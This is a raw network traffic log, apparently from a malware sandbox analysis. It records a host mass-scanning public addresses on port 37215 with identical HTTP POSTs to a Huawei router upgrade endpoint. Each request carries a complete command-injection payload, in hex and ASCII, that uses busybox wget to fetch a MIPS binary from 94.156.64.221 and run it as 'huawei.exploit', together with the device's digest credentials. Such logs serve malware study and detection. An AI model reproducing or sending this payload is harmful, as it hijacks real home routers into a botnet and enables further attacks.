2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    678192.168.2.2341184197.199.175.9537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307585955 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    679192.168.2.2338878197.19.181.18037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307625055 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    680192.168.2.2340474156.148.149.21237215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307704926 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    681192.168.2.2341044197.65.82.16137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307739019 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    682192.168.2.2349984197.205.140.17337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307768106 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    683192.168.2.2352408156.2.53.20137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307801008 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    684192.168.2.2346636197.46.217.4037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307832003 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    685192.168.2.2357742197.149.153.18337215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307866096 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    686192.168.2.235418441.8.69.15837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307898045 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    687192.168.2.233802641.116.27.937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307936907 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    688192.168.2.2341492197.90.12.3737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.307965040 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
